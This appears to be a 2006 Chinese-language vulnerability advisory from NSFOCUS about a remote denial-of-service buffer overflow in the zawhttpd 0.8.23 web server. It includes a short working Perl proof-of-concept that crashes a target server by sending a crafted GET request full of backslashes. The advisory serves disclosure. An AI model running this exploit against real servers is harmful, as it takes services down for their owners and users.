安全研究

安全漏洞
zawhttpd HTTP GET远程拒绝服务漏洞

发布日期:2006-05-03
更新日期:2006-05-03

受影响系统:
Norz zawhttpd 0.8.23
描述:
BUGTRAQ  ID: 17814

zawhttpd是一款小型的Web服务器程序。

zawhttpd在处理用户请求时存在漏洞,远程攻击者可以发送特制的HTTP GET请求触发缓冲区溢出,导致zawhttpd进程崩溃。

<*来源:Kamil Sienicki (K3@spelunca.int.pl
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114676051831679&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
#               by Kamil 'K3' Sienicki

use IO::Socket;
use strict;

my($socket) = "";

if($socket = IO::Socket::INET->new(
                PeerAddr => $ARGV[0],
                PeerPort => $ARGV[1],
                Proto => "TCP"))
{
        print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";  
        print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
        close($socket);
}
else
{
        print "perl zawhttpd.pl localhost 80 \n";
        print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}

建议:
厂商补丁:

Norz
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.norz.org/zawhttpd.html

浏览次数:2657
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障